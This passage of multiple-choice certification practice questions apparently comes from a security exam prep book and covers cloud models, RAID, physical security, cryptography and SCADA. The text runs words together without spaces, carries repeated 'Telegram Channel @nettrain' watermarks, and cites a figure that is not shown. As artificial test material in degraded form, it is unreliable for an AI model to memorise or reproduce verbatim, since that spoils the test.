34. Mariaisasecurityengineerwithamanufacturingcompany.Duringarecentinvestigation,shediscoveredthatanengineer'scompromisedworkstationwasbeingusedtoconnecttoSCADAsystemswhiletheengineerwasnotloggedin.TheengineerisresponsibleforadministeringtheSCADAsystemsandcannotbeblockedfromconnectingtothem.WhatshouldMariadotomitigatethisthreat?
A. Installhost-basedantivirussoftwareontheengineer'ssystem.
B. ImplementaccountusageauditingontheSCADAsystem.
C. ImplementanNIPSontheSCADAsystem.
D. UseFDEontheengineer'ssystem.
35. AESandDESareanexampleofwhattypeofcipher?
A. Streamciphersthatencryptgroupsofplain-textsymbolsalltogether
B. Blockciphersthatencryptgroupsofplain-textsymbolsalltogether
C. Streamciphersthatencryptoneplain-textsymbolatatime
D. Blockciphersthatencryptoneplain-textsymbolatatime
36. Gerardisresponsibleforsecurecommunicationswithhiscompany'se-commerceserver.AllcommunicationswiththeserveruseTLS.WhatisthemostsecureoptionforGerardtostoretheprivatekeyonthee-commerceserver?
A. HSM
B. FDE
C. SED
D. SDN
37. Whatpurposedoesatransitgatewayserveincloudservices?
A. Itconnectssystemsinsideofaclouddatacenter.
B. Itconnectsvirtualprivatecloudsandon-premisesnetworks.
C. ItprovidesanAPIgatewaybetweentrustzones.
D. Itallowsmulticloudinfrastructuredesigns.
Telegram Channel @nettrain
38. Webdevelopersinyourcompanycurrentlyhavedirectaccesstotheproductionserverandcandeploycodedirectlytoit.Thiscanleadtounsecurecode,orsimplycodeflawsbeingdeployedtothelivesystem.Whatwouldbethebestchangeyoucouldmaketomitigatethisrisk?
A. Implementsandboxing.
B. Implementvirtualizedservers.
C. Implementastagingserver.
D. Implementdeploymentpolicies.
39. IanisconcernedaboutVoIPphonesusedinhisorganizationduetotheuseofSMSaspartoftheirmultifactorauthenticationrollout.Whattypeattackshouldhebeconcernedabout?
A. Avishingattack
B. Avoicemailhijack
C. AnSMStokenredirect
D. Aweakmultifactorcodeinjection
40. AngelawantstoensurethatIoTdevicesinherorganizationhaveasecureconfigurationwhentheyaredeployedandthattheyarereadyforfurtherconfigurationfortheirspecificpurposes.Whattermisusedtodescribethesestandardconfigurationsusedaspartofherconfigurationmanagementprogram?
A. Abaselineconfiguration
B. Anessentialsettingslist
C. Apreinstallchecklist
D. Asetupguide
41. Whyisheating,ventilation,andair-conditioning(HVAC)partoforganizationalsecurityplanning?
A. AttackersoftenuseHVACsystemsaspartofsocialengineeringexercises.
B. HVACsystemsareimportantforavailability.
C. HVACsystemsareaprimarylineofnetworkdefense.
Telegram Channel @nettrain
D. Noneoftheabove
42. Whatadvantagedoessymmetricencryptionhaveoverasymmetricencryption?
A. Itismoresecure.
B. Itisfaster.
C. Itcanuselongerkeys.
D. Itsimplifieskeydistributions.
43. Lauraknowsthatpredictabilityisaprobleminpseudo-randomnumbergenerators(PRNGs)usedforencryptionoperations.WhattermdescribesthemeasureofuncertaintyusedtoaPRNG?
A. Ellipses
B. Quantumflux
C. Entropy
D. Primeness
44. WhichcloudservicemodelgivestheconsumertheabilitytouseapplicationsprovidedbythecloudproviderovertheInternet?
A. SaaS
B. PaaS
C. IaaS
D. Hybrid
45. Chrissetsaresourcepolicyinhiscloudenvironment.Whattypeofcontroldoesthisallowhimtoexert?
A. Itallowshimtodeterminehowmuchdiskspacecanbeused.
B. Itallowshimtodeterminehowmuchbandwidthcanbeused.
C. Itallowshimtospecifywhohasaccesstoresourcesandwhatactionstheycanperformonit.
D. Itallowshimtospecifywhatactionsaresourcecantakeonspecificusers.
46. ChrissetsupSANreplicationforhisorganization.Whathashedone?
Telegram Channel @nettrain
A. HehasenabledRAID1toensurethattheSANcannotlosedataifadrivefailsbecausethedrivesarereplicated.
B. HehassetupbackupstoatapelibraryfortheSANtoensuredataresilience.
C. HehasbuiltasecondidenticalsetofhardwareforhisSAN.
D. HehasreplicatedthedataononeSANtoanotherattheblockorhardwarelevel.
47. Mikeisasecurityanalystandhasjustremovedmalwarefromavirtualserver.Whatfeatureofvirtualizationwouldheusetoreturnthevirtualservertoalastknowngoodstate?
A. Sandboxing
B. Hypervisor
C. Snapshot
D. Elasticity
48. Lisaisconcernedaboutfaulttoleranceforherdatabaseserver.Shewantstoensurethatifanysingledrivefails,itcanberecovered.WhatRAIDlevelwouldsupportthisgoalwhileusingdistributedparitybits?
A. RAID0
B. RAID1
C. RAID3
D. RAID5
49. JarodisconcernedaboutEMIaffectingakeyescrowserver.Whichmethodwouldbemosteffectiveinmitigatingthisrisk?
A. VLAN
B. SDN
C. Trustedplatformmodule
D. Faradaycage
50. Johnisresponsibleforphysicalsecurityathiscompany.Heisparticularlyconcernedaboutanattackerdrivingavehicleintothebuilding.Whichofthefollowingwouldprovidethebestprotectionagainstthisthreat?
Telegram Channel @nettrain
A. Agate
B. Bollards
C. Asecurityguardonduty
D. Securitycameras
51. Markisresponsibleforcybersecurityatasmallcollege.Therearemanycomputerlabsthatareopenforstudentstouse.Theselabsaremonitoredonlybyastudentworker,whomayormaynotbeveryattentive.Markisconcernedaboutthetheftofcomputers.Whichofthefollowingwouldbethebestwayforhimtomitigatethisthreat?
A. Cablelocks
B. FDEonthelabcomputers
C. Strongpasswordsonthelabcomputers
D. Havingalabsign-insheet
52. Joanneisresponsibleforsecurityatapowerplant.Thefacilityisverysensitiveandsecurityisextremelyimportant.Shewantstoincorporatetwo-factorauthenticationwithphysicalsecurity.Whatwouldbethebestwaytoaccomplishthis?
A. Smartcards
B. AmantrapwithasmartcardatonedoorandaPINkeypadattheotherdoor
C. Amantrapwithvideosurveillance
D. Afencewithasmartcardgateaccess
53. Whichofthefollowingtermsreferstotheprocessofestablishingastandardforsecurity?
A. Baselining
B. Securityevaluation
C. Hardening
D. Normalization
54. Angelaconfiguresahoneypottoongoingeventslikeuserloginsandlogouts,diskusage,programandscriptloads,andsimilarinformation.
Telegram Channel @nettrain
Whatisthistypeofdeceptioncalled?
A. Faketelemetry
B. Useremulation
C. Honeyfakes
D. Deepfakes
55. WhichlevelofRAIDisa“stripeofmirrors”?
A. RAID1+0
B. RAID6
C. RAID0
D. RAID1
56. Isabellaisresponsiblefordatabasemanagementandsecurity.Sheisattemptingtoremoveredundancyinthedatabase.Whatisthisprocesscalled?
A. Integritychecking
B. Deprovisioning
C. Baselining
D. Normalization
57. GarywantstoimplementanAAAservice.Whichofthefollowingservicesshouldheimplement?
A. OpenID
B. LDAP
C. RADIUS
D. SAML
58. WheredoesTLS/SSLinspectionhappen,andhowdoesitoccur?
A. Ontheclient,usingaproxy
B. Ontheserver,usingaprotocolanalyzer
C. Atthecertificateauthority,byvalidatingarequestforaTLScertificate
D. Betweentheclientandserverbyinterceptingencrypted
Telegram Channel @nettrain
communications
59. Dianawantstopreventdronesfromflyingoverherorganization'sproperty.Whatcanshedo?
A. Deployautomateddronetake-downsystemsthatwillshootthedronesdown.
B. Deployradiofrequencyjammingsystemstodisruptthedrone'scontrolfrequencies.
C. ContacttheFAAtogethercompany'spropertylistedasano-flyzone.
D. Noneoftheabove
60. Isaachasconfiguredaninfrastructure-as-code-basedcloudenvironmentthatreliesoncode-definedsystembuildstospinupnewsystemsastheservicestheyrunneedtoscalehorizontally.Anattackerdiscoversavulnerabilityandexploitsasysteminthecluster,butitisshutdownandterminatedbeforetheycanperformaforensicanalysis.Whattermdescribesthistypeofenvironment?
A. Forensic-resistant
B. Nonpersistent
C. Live-boot
D. Terminateandstayresident
61. Youareresponsiblefordatabasesecurityatyourcompany.YouareconcernedthatprogrammersmightpassbadlywrittenSQLcommandstothedatabase,orthatanattackermightexploitbadlywrittenSQLinapplications.Whatisthebestwaytomitigatethisthreat?
A. Formalcodeinspection
B. Programmingpolicies
C. Agileprogramming
D. Storedprocedures
62. Joanna'scompanyhasadoptedmultiplesoftware-as-a-service(SaaS)toolsandnowwantstobettercoordinatethemsothatthedatathattheyeachcontaincanbeusedinmultipleservices.Whattypeofsolutionshouldsherecommendifshewantstominimizethecomplexityoflong-termmaintenanceforherorganization?
Telegram Channel @nettrain
A. ReplacetheSaaSservicewithaplatform-as-a-service(PaaS)environmenttomoveeverythingtoasingleplatform.
B. BuildAPI-basedintegrationsusingin-houseexpertise.
C. Adoptanintegrationplatformtoleveragescalability.
D. Buildflat-fileintegrationsusingin-houseexpertise.
63. Farèsisresponsibleformanagingthemanyvirtualmachinesonhiscompany'snetworks.Overthepasttwoyears,thecompanyhasincreasedthenumberofvirtualmachinessignificantly.Farèsisnolongerabletoeffectivelymanagethelargenumberofmachines.Whatisthetermforthissituation?
A. VMoverload
B. VMsprawl
C. VMspread
D. VMzombies
64. Maryisresponsibleforvirtualizationmanagementinhercompany.SheisconcernedaboutVMescape.Whichofthefollowingmethodswouldbethemosteffectiveinmitigatingthisrisk?
A. OnlyshareresourcesbetweentheVMandhostifabsolutelynecessary.
B. KeeptheVMpatched.
C. UseafirewallontheVM.
D. Usehost-basedantimalwareontheVM.
65. Irenewantstouseacloudserviceforherorganizationthatdoesnotrequirehertodoanycodingorsystemadministration,andshewantstodominimalconfigurationtoperformthetasksthatherorganizationneedstoaccomplish.Whattypeofcloudserviceisshemostlikelylookingfor?
A. SaaS
B. PaaS
C. IaaS
D. IDaaS
66. Whichofthefollowingisnotanadvantageofaserverlessarchitecture?
Telegram Channel @nettrain
A. Itdoesnotrequireasystemadministrator.
B. Itcanscaleasfunctioncallfrequencyincreases.
C. Itcanscaleasfunctioncallfrequencydecreases.
D. Itisidealforcomplexapplications.
67. Youareresponsibleforserverroomsecurityforyourcompany.Youareconcernedaboutphysicaltheftofthecomputers.Whichofthefollowingwouldbebestabletodetecttheftorattemptedtheft?
A. Motionsensor–activatedcameras
B. Smartcardaccesstotheserverrooms
C. Strongdeadboltlocksfortheserverrooms
D. Loggingeveryonewhoenterstheserverroom
68. Alexandrawantstopreventsystemsthatareinfectedwithmalwarefromconnectingtoabotnetcontrollerthatsheknowsthehostnamesfor.Whattypeofsolutioncansheimplementtopreventthesystemsfromreachingthecontroller?
A. AnIDS
B. Around-robinDNS
C. ADNSsinkhole
D. AWAF
69. Hectorisusinginfraredcamerastoverifythatserversinhisdatacenterarebeingproperlyracked.Whichofthefollowingdatacenterelementsisheconcernedabout?
A. EMIblocking
B. Humiditycontrol
C. Hotandcoldaisles
D. UPSfailover
70. Geraldisconcernedaboutunauthorizedpeopleenteringthecompany'sbuilding.Whichofthefollowingwouldbemosteffectiveinpreventingthis?
A. Alarmsystems
Telegram Channel @nettrain
B. Fencing
C. Cameras
D. Securityguards
71. WhichofthefollowingisthemostimportantbenefitfromimplementingSDN?
A. Itwillstopmalware.
B. Itprovidesscalability.
C. Itwilldetectintrusions.
D. Itwillpreventsessionhijacking.
72. Markisanadministratorforahealthcarecompany.Hehastosupportanolder,legacyapplication.Heisconcernedthatthislegacyapplicationmighthavevulnerabilitiesthatwouldaffecttherestofthenetwork.Whatisthemostefficientwaytomitigatethis?
A. Useanapplicationcontainer.
B. ImplementSDN.
C. RuntheapplicationonaseparateVLAN.
D. Insistonanupdatedversionoftheapplication.
73. Charlesisperformingasecurityreviewofaninternallydevelopedwebapplication.Duringhisreview,henotesthatthedeveloperswhowrotetheapplicationhavemadeuseofthird-partylibraries.Whatrisksshouldhenoteaspartofhisreview?
A. Codecompiledwithvulnerablethird-partylibrarieswillneedtoberecompiledwithpatchedlibraries.
B. Librariesusedviacoderepositoriescouldbecomeunavailable,breakingtheapplication.
C. Maliciouscodecouldbeaddedwithoutthedevelopersknowingit.
D. Alloftheabove
74. Valerieisconsideringdeployingacloudaccesssecuritybroker.Whatsortoftoolisshelookingat?
A. Asystemthatimplementsmandatoryaccesscontroloncloud
Telegram Channel @nettrain
infrastructure
B. Atoolthatsitsbetweencloudusersandapplicationstomonitoractivityandenforcepolicies
C. Atoolthatsitsbetweencloudapplicationprovidersandcustomerstoenforcewebapplicationsecuritypolicies
D. Asystemthatimplementsdiscretionaryaccesscontroloncloudinfrastructure
75. Derekhasbeenaskedtoimplementhisorganization'sservice-orientedarchitectureasasetofmicroservices.Whatdoesheneedtoimplement?
A. Asetoflooselycoupledserviceswithspecificpurposes
B. Asetofservicesthatrunonverysmallsystems
C. Asetoftightlycoupledserviceswithcustom-designedprotocolstoensurecontinuousoperation
D. Asetofservicesusingthird-partyapplicationsinaconnectednetworkenabledwithindustrystandardprotocols
76. Abigailisresponsiblefordatacentersinalarge,multinationalcompany.Shehastosupportmultipledatacentersindiversegeographicregions.Whatwouldbethemosteffectivewayforhertomanagethesecentersconsistentlyacrosstheenterprise?
A. Hiredatacentermanagersforeachcenter.
B. Implemententerprise-wideSDN.
C. Implementinfrastructureascode(IaC).
D. Automateprovisioninganddeprovisioning.
77. Elizabethwantstoimplementacloud-basedauthorizationsystem.Whichofthefollowingprotocolsisshemostlikelytouseforthatpurpose?
A. OpenID
B. Kerberos
C. SAML
D. OAuth
78. Gregisassessinganorganizationandfindsthattheyhavenumerous
Telegram Channel @nettrain
multifunctionprinters(MFPs)thatareaccessiblefromthepublicInternet.Whatisthemostcriticalsecurityissueheshouldidentify?
A. Thirdpartiescouldprinttotheprinters,usingupthesupplies.
B. TheprinterscouldbeusedaspartofaDDoSattack.
C. Theprintersmayallowattackerstoaccessotherpartsofthecompanynetwork.
D. Thescannersmaybeaccessedtoallowattackerstoscandocumentsthatareleftinthem.
79. Keithhasdeployedcomputerstousersinhiscompanythatloadtheirresourcesfromacentralserverenvironmentratherthanfromtheirownharddrives.Whattermdescribesthismodel?
A. Thickclients
B. Client-as-a-server
C. Clouddesktops
D. Thinclients
80. Henrynoticesthatamalwaresampleheisanalyzingdownloadsafilefromimgur.comandthenexecutesanattackusingMimikatz,apowerfulWindowspasswordaccountthefttool.Whenheanalyzestheimage,hecannotidentifyanyrecognizablecode.Whattechniquehasmostlikelybeenusedinthisscenario?
A. Theimageisusedasdecryptionkey.
B. Thecodeishiddenintheimageusingsteganography.
C. Thecodeisencodedastextintheimage.
D. Theimageisacontrolcommandfromamalwarecommandandcontrolnetwork.
81. Mollywantstoadviseherorganization'sdevelopersonsecurecodingtechniquestoavoiddataexposure.Whichofthefollowingisnotacommontechniqueusedtopreventsensitivedataexposure?
A. Storedatainplaintext.
B. RequireHTTPsforallauthenticatedpages.
C. Ensuretokensarenotdisclosedinpublicsourcecode.
Telegram Channel @nettrain
D. Hashpasswordsusingasalt.
82. Naomiwantstosecureareal-timeoperatingsystem(RTOS).WhichofthefollowingtechniquesisbestsuitedtoprovidingRTOSsecurity?
A. Disablethewebbrowser.
B. Installahostfirewall.
C. Usesecurefirmware.
D. Installantimalwaresoftware.
83. Johnisexaminingthelogsforhiscompany'swebapplications.Hediscoverswhathebelievesisabreach.Afterfurtherinvestigation,itappearsasiftheattackerexecutedcodefromoneofthelibrariestheapplicationuses,codethatisnolongerevenusedbytheapplication.Whatbestdescribesthisattack?
A. Bufferoverflow
B. Codereuseattack
C. DoSattack
D. Sessionhijacking
84. Chrisisdesigninganembeddedsystemthatneedstoprovidelow-power,peer-to-peercommunications.Whichofthefollowingtechnologiesisbestsuitedtothispurpose?
A. Basebandradio
B. Narrowbandradio
C. Zigbee
D. Cellular
85. Whattermisusedtodescribeencryptionthatcanpermitcomputationstobeconductedonciphertext,withtheresultsmatchingwhatwouldhaveoccurredifthesamecomputationswereperformedontheoriginalplaintext?
A. Identity-preservingencryption
B. Homomorphicencryption
C. Replicableencryption
Telegram Channel @nettrain
D. Noneoftheabove
86. Tonywantstoimplementabiometricsystemforentryaccessinhisorganization.Whichofthefollowingsystemsislikelytobemostacceptedbymembersofhisorganization'sstaff?
A. Fingerprint
B. Retina
C. Iris
D. Voice
87. Nathanwantstoimplementoff-sitecoldbackups.Whatbackuptechnologyismostcommonlyusedforthistypeofneed?
A. SAN
B. Disk
C. Tape
D. NAS
88. Allanisconsideringimplementingoff-sitestorage.Whenhedoes,hisdatacentermanageroffersfoursolutions.Whichofthesesolutionswillbestensureresilienceandwhy?
A. Backuptoaseconddatacenterinanotherbuildingnearby,allowingreducedlatencyforbackups.
B. Backuptoanoff-sitelocationatleast90milesawaytoensurethatanaturaldisasterdoesnotdestroybothcopies.
C. Backuptoaseconddatacenterinanotherbuildingnearbytoensurethatthedatawillbeaccessibleifthepowerfailstotheprimarybuilding.
D. Backuptoanoff-sitelocationatleast10milesawaytobalancelatencyandresilienceduetonaturaldisaster.
89. Benhasbeenaskedtoexplainthesecurityimplicationsforanembeddedsystemthathisorganizationisconsideringbuildingandselling.Whichofthefollowingisnotatypicalconcernforembeddedsystems?
A. Limitedprocessorpower
B. Aninabilitytopatch
Telegram Channel @nettrain
C. Lackofauthenticationcapabilities
D. Lackofbulkstorage
90. Youareconcernedaboutthesecurityofnewdevicesyourcompanyhasimplemented.SomeofthesedevicesuseSoCtechnology.Whatwouldbethebestsecuritymeasureyoucouldtakeforthese?
A. UsingaTPM
B. Ensuringeachhasitsowncryptographickey
C. UsingSED
D. UsingBIOSprotection
91. Vincentworksforacompanythatmanufacturesportablemedicaldevices,suchasinsulinpumps.Heisconcernedaboutensuringthesedevicesaresecure.Whichofthefollowingisthemostimportantstepforhimtotake?
A. Ensureallcommunicationswiththedeviceareencrypted.
B. EnsurethedeviceshaveFDE.
C. Ensurethedeviceshaveindividualantimalware.
D. Ensurethedeviceshavebeenfuzz-tested.
92. Emileisconcernedaboutsecuringthecomputersystemsinvehicles.Whichofthefollowingvehicletypeshassignificantcybersecurityvulnerabilities?
A. UAV
B. Automobiles
C. Airplanes
D. Alloftheabove
93. WhatadditionalsecuritycontrolcanAmandaimplementifsheusescompiledsoftwarethatshecannotuseifsheonlyhassoftwarebinaries?
A. Shecanreviewthesourcecode.
B. Shecantesttheapplicationinaliveenvironment.
C. Shecancheckthechecksumsprovidedbythevendor.
D. Noneoftheabove
94. Gretawantstounderstandhowaprotocolworks,includingwhatvalues
Telegram Channel @nettrain
shouldbeincludedinpacketsthatusethatprotocol.Whereisthisdatadefinitivelydefinedanddocumented?
A. AnRFC
B. Wikipedia
C. TheInternetArchive
D. Noneoftheabove
95. Usingstandardnamingconventionsprovidesanumberofadvantages.Whichofthefollowingisnotanadvantageofusinganamingconvention?
A. Itcanhelpadministratorsdeterminethefunctionofasystem.
B. Itcanhelpadministratorsidentifymisconfiguredorroguesystems.
C. Itcanhelpconcealsystemsfromattackers.
D. Itcanmakescriptingeasier.
96. Whatprocessisshowninthefollowingfigure?
A. Acontinuousmonitoringenvironment
B. ACI/CDpipeline
C. Astaticcodeanalysissystem
D. Amalwareanalysisprocess
97. Keithwantstoidentifyasubjectfromcamerafootagefromatrainstation.Whatbiometrictechnologyisbestsuitedtothistypeofidentification?
A. Veinanalysis
B. Voiceprintanalysis
C. Fingerprintanalysis
D. Gaitanalysis
98. Yourcompanyisinterestedinkeepingdatainthecloud.Managementfeels
Telegram Channel @nettrain
thatpubliccloudsarenotsecurebutisconcernedaboutthecostofaprivatecloud.Whatisthesolutionyouwouldrecommend?
A. Tellthemtherearenoriskswithpublicclouds.
B. Tellthemtheywillhavetofindawaytobudgetforaprivatecloud.
C. Suggestthattheyconsideracommunitycloud.
D. Recommendagainstacloudsolutionatthistime.
99. YourdevelopmentteamprimarilyusesWindows,buttheyneedtodevelopaspecificsolutionthatwillrunonLinux.WhatisthebestsolutiontogetyourprogrammersaccesstoLinuxsystemsfordevelopmentandtestingifyouwanttouseacloudsolutionwhereyoucouldrunthefinalsystemsinproductionaswell?
A. Settheirmachinestodual-bootWindowsandLinux.
B. UsePaaS.
C. SetupafewLinuxmachinesforthemtoworkwithasneeded.
D. UseIaaS.
100. Corrinehasbeenaskedtoautomatesecurityresponses,includingblockingIPaddressesfromwhichattacksaredetectedusingaseriesofscripts.Whatcriticaldangershouldsheconsiderwhilebuildingthescriptsforherorganization?
A. Thescriptscouldcauseanoutage.
B. ThescriptsmaynotrespondpromptlytoprivateIPaddresses.
C. Attackerscouldusethescriptstoattacktheorganization.
D. Auditorsmaynotallowthescripts.
101. Madhurihasconfiguredabackupthatwillbackupallofthechangestoasystemsincethelasttimethatafullbackupoccurred.Whattypeofbackuphasshesetup?
A. Asnapshot
B. Afullbackup
C. Anincrementalbackup
D. Adifferential
Telegram Channel @nettrain
102. YouaretheCIOforasmallcompany.Thecompanywantstousecloudstorageforsomeofitsdata,butcostisamajorconcern.Whichofthefollowingclouddeploymentmodelswouldbebest?
A. Communitycloud
B. Privatecloud
C. Publiccloud
D. Hybridcloud
103. Whatisthepointwherefalseacceptancerateandfalserejectionratecrossoverinabiometricsystem?
A. CRE
B. FRE
C. CER
D. FRR
104. Devinisbuildingacloudsystemandwantstoensurethatitcanadapttochangesinitsworkloadbyprovisioningordeprovisioningresourcesautomatically.Hisgoalistoensurethattheenvironmentisnotoverprovisionedorunderprovisionedandthatheisefficientlyspendingmoneyonhisinfrastructure.Whatconceptdescribesthis?
A. Verticalscalability
B. Elasticity
C. Horizontalscalability
D. Normalization
105. Nathanielwantstoimprovethefaulttoleranceofaserverinhisdatacenter.Ifhewantstoensurethatapoweroutagedoesnotcausetheservertolosepower,whatisthefirstcontrolheshoulddeployfromthefollowinglist?
A. AUPS
B. Agenerator
C. Dualpowersupplies
D. Managedpowerunits(PDUs)
106. WhichofthefollowingisthebestdescriptionforVMsprawl?
Telegram Channel @nettrain
A. WhenVMsonyournetworkoutnumberphysicalmachines
B. WhentherearemoreVMsthanITcaneffectivelymanage
C. WhenaVMonacomputerbeginstoconsumetoomanyresources
D. WhenVMsarespreadacrossawideareanetwork
107. Whichofthefollowingisthebestdescriptionofastoredprocedure?
A. CodethatisinaDLL,ratherthantheexecutable
B. Server-sidecodethatiscalledfromaclient
C. SQLstatementscompiledonthedatabaseserverasasingleprocedurethatcanbecalled
D. Proceduresthatarekeptonaseparateserverfromthecallingapplication,suchasinmiddleware
108. Farèsisresponsibleforsecurityathiscompany.Hehashadbollardsinstalledaroundthefrontofthebuilding.WhatisFarèstryingtoaccomplish?
A. Gatedaccessforpeopleenteringthebuilding
B. Videomonitoringaroundthebuilding
C. ProtectingagainstEMI
D. Preventingavehiclefrombeingdrivenintothebuilding
109. ThelargecompanythatSelahworksatusesbadgeswithamagneticstripeforentryaccess.WhichthreatmodelshouldSelahbeconcernedaboutwithbadgeslikethese?
A. Cloningofbadges
B. Tailgating
C. Usebyunauthorizedindividuals
D. Alloftheabove
110. YouareconcernedaboutVMescapeattackscausingasignificantdatabreach.Whichofthefollowingwouldprovidethemostprotectionagainstthis?
A. SeparateVMhostsbydatatypeorsensitivity.
B. Installahost-basedantivirusonboththeVMandthehost.
Telegram Channel @nettrain
C. ImplementFDEonboththeVMandthehost.
D. UseaTPMonthehost.
111. Teresaisthenetworkadministratorforasmallcompany.Thecompanyisinterestedinarobustandmodernnetworkdefensestrategybutlacksthestafftosupportit.WhatwouldbethebestsolutionforTeresatouse?
A. ImplementSDN.
B. Useautomatedsecurity.
C. UseanMSSP.
D. Implementonlythefewsecuritycontrolstheyhavetheskillstoimplement.
112. Dennisistryingtosetupasystemtoanalyzetheintegrityofapplicationsonhisnetwork.HewantstomakesurethattheapplicationshavenotbeentamperedwithorTrojaned.Whatwouldbemostusefulinaccomplishingthisgoal?
A. ImplementNIPS.
B. Usecryptographichashes.
C. Sandboxtheapplicationsinquestion.
D. ImplementNIDS.
113. Georgeisanetworkadministratoratapowerplant.Henoticesthatseveralturbineshadunusualramp-upsincycleslastweek.Afterinvestigating,hefindsthatanexecutablewasuploadedtothesystemcontrolconsoleandcausedthis.WhichofthefollowingwouldbemosteffectiveinpreventingthisfromaffectingtheSCADAsysteminthefuture?
A. ImplementSDN.
B. Improvepatchmanagement.
C. PlacetheSCADAsystemonaseparateVLAN.
D. Implementencrypteddatatransmissions.
114. Gordonknowsthatregressiontestingisimportantbutwantstopreventoldversionsofcodefrombeingre-insertedintonewreleases.Whatprocessshouldheusetopreventthis?
Telegram Channel @nettrain
A. Continuousintegration
B. Versionnumbering
C. Continuousdeployment
D. Releasemanagement
115. Miaisanetworkadministratorforabank.Sheisresponsibleforsecurecommunicationswithhercompany'scustomerwebsite.Whichofthefollowingwouldbethebestforhertoimplement?
A. SSL
B. PPTP
C. IPSec
D. TLS
116. Whichofthefollowingisnotacommonchallengewithsmartcard-basedauthenticationsystems?
A. Weaksecurityduetothelimitationsofthesmartcard'sencryptionsupport
B. Addedexpenseduetocardreaders,distribution,andsoftwareinstallation
C. Weakeruserexperienceduetotherequirementtoinsertthecardforeveryauthentication
D. Lackofsecurityduetopossessionofthecardbeingtheonlyfactorused
117. Susan'ssecurebuildingisequippedwithalarmsthatgooffifspecificdoorsareopened.Aspartofapenetrationtest,Susanwantstodetermineifthealarmsareeffective.Whattechniqueisusedbypenetrationtesterstomakealarmslesseffective?
A. Settingoffthealarmsaspartofapreannouncedtest
B. Disablingthealarmsandthenopeningdoorstoseeifstaffreporttheopeneddoors
C. Askingstaffmemberstoopenthedoorstoseeiftheywillsetthealarmoff
D. Settingoffthealarmsrepeatedlysothatstaffbecomeusedtohearing
Telegram Channel @nettrain
themgooff
118. Whattermisusedtodescribethegeneralconceptof“anythingasaservice”?
A. AaaS
B. ATaaS
C. XaaS
D. ZaaS
119. Whatroledoessignageplayinbuildingsecurity?
A. Itisapreventivecontrolwarningunauthorizedindividualsawayfromsecuredareas.
B. Itcanhelpwithsafetybywarningaboutdangerousareas,materials,orequipment.
C. Itcanprovidedirectionsforevacuationandgeneralnavigation.
D. Alloftheabove
120. Norahasrentedabuildingwithaccesstobandwidthandpowerincaseherorganizationeverexperiencesadisaster.Whattypeofsitehassheestablished?
A. Ahotsite
B. Acoldsite
C. Awarmsite
D. AMOUsite
121. MattispatchingaWindowssystemandwantstohavetheabilitytoreverttoalastknowngoodconfiguration.Whatshouldheset?
A. Asystemrestorepoint
B. Areversionmarker
C. Anonpersistentpatchpoint
D. Alivebootmarker
122. Whichmultifactorauthenticationcansufferfromproblemsifthesystemordevice'stimeisnotcorrect?
Telegram Channel @nettrain
A. TOTP
B. SMS
C. HOTP
D. MMAC
123. ThecompanythatNinaworksforhassufferedfromrecenttheftsofpackagesfromalow-securitydeliveryarea.Whattypeofcameracapabilitycantheyusetoensurethatarecentlydeliveredpackageisproperlymonitored?
A. Infraredimagecapture
B. Motiondetection
C. Objectdetection
D. Facialrecognition
124. Whichofthefollowingisnotacommonorganizationalsecurityconcernforwearabledevices?
A. GPSlocationdataexposure
B. Dataexposure
C. Userhealthdataexposure
D. Insecurewirelessconnectivity
125. TimisbuildingaFaradaycagearoundhisserverroom.WhatistheprimarypurposeofaFaradaycage?
A. Toregulatetemperature
B. Toregulatecurrent
C. Toblockintrusions
D. ToblockEMI
126. Youareworkingforalargecompany.Youaretryingtofindasolutionthatwillprovidecontrolledphysicalaccesstothebuildingandrecordeveryemployeewhoentersthebuilding.Whichofthefollowingwouldbethebestforyoutoimplement?
A. Asecurityguardwithasign-insheet
B. Smartcardaccessusingelectroniclocks
Telegram Channel @nettrain
C. Acamerabytheentrance
D. Asign-insheetbythefrontdoor
127. Whatconcerncausesorganizationstochoosephysicallocksoverelectroniclocks?
A. Theyprovidegreatersecurity.
B. Theyareresistanttobypassattempts.
C. Theyarehardertopick.
D. Theydonotrequirepower.
128. KarahasbeenaskedtoincludeIPschemamanagementaspartofherconfigurationmanagementefforts.WhichofthefollowingisasecurityadvantageofIPschemaconfigurationmanagement?
A. Detectingroguedevices
B. UsingIPaddressestosecureencryptionkeys
C. Preventingdenial-of-serviceattacks
D. AvoidingIPaddressexhaustion
129. Caroleisconcernedaboutsecurityforherserverroom.Shewantsthemostsecurelockshecanfindfortheserverroomdoor.Whichofthefollowingwouldbethebestchoiceforher?
A. Combinationlock
B. Key-in-knob
C. Deadbolt
D. Padlock
130. MelissawantstoimplementNICteamingforaserverinherdatacenter.Whattwomajorcapabilitieswillthisprovideforher?
A. Lowerlatencyandgreaterthroughput
B. Greaterthroughputandfaulttolerance
C. Higherlatencyandfaulttolerance
D. Faulttoleranceandlowerlatency
131. Mollyisimplementingbiometricsinhercompany.Whichofthefollowing
Telegram Channel @nettrain
shouldbeherbiggestconcern?
A. FAR
B. FRR
C. CER
D. EER
132. Mikeisconcernedaboutdatasovereigntyfordatathathisorganizationcapturesandmaintains.Whatbestdescribeshisconcern?
A. Whoownsthedatathatiscapturedonsystemshostedinacloudprovider'sinfrastructure?
B. CanMike'sorganizationmakedecisionsaboutdatathatispartofitsservice,ordoesitbelongtousers?
C. Isthedatalocatedinacountrysubjecttothelawsofthecountrywhereitisstored?
D. Doesdatahaverightsonitsown,ordoestheownerofthedatadeterminewhatrightsmayapplytoit?
133. Whatarethekeylimitingfactorsforcryptographyonlow-powerdevices?
A. Therearesystemlimitationsonmemory,CPU,andstorage.
B. Thedevicescannotsupportpublickeyencryptionduetoaninabilitytofactorprimenumbers.
C. Thereisalackofchipsetsupportforencryption.
D. Legallimitationsforlow-powerdevicespreventencryptionfrombeingsupported.
134. Fredisresponsibleforphysicalsecurityinhiscompany.HewantstofindagoodwaytoprotecttheUSBthumbdrivesthathaveBitLockerkeysstoredonthem.Whichofthefollowingwouldbethebestsolutionforthissituation?
A. Storethedrivesinasecurecabinetorsafe.
B. Encryptthethumbdrives.
C. Don'tstoreBitLockerkeysonthesedrives.
D. Lockthethumbdrivesindeskdrawers.
Telegram Channel @nettrain
135. Juanitaisresponsibleforserversinhercompany.Sheislookingforafault-tolerantsolutionthatcanhandletwodrivesfailing.Whichofthefollowingshouldsheselect?
A. RAID3
B. RAID0
C. RAID5
D. RAID6
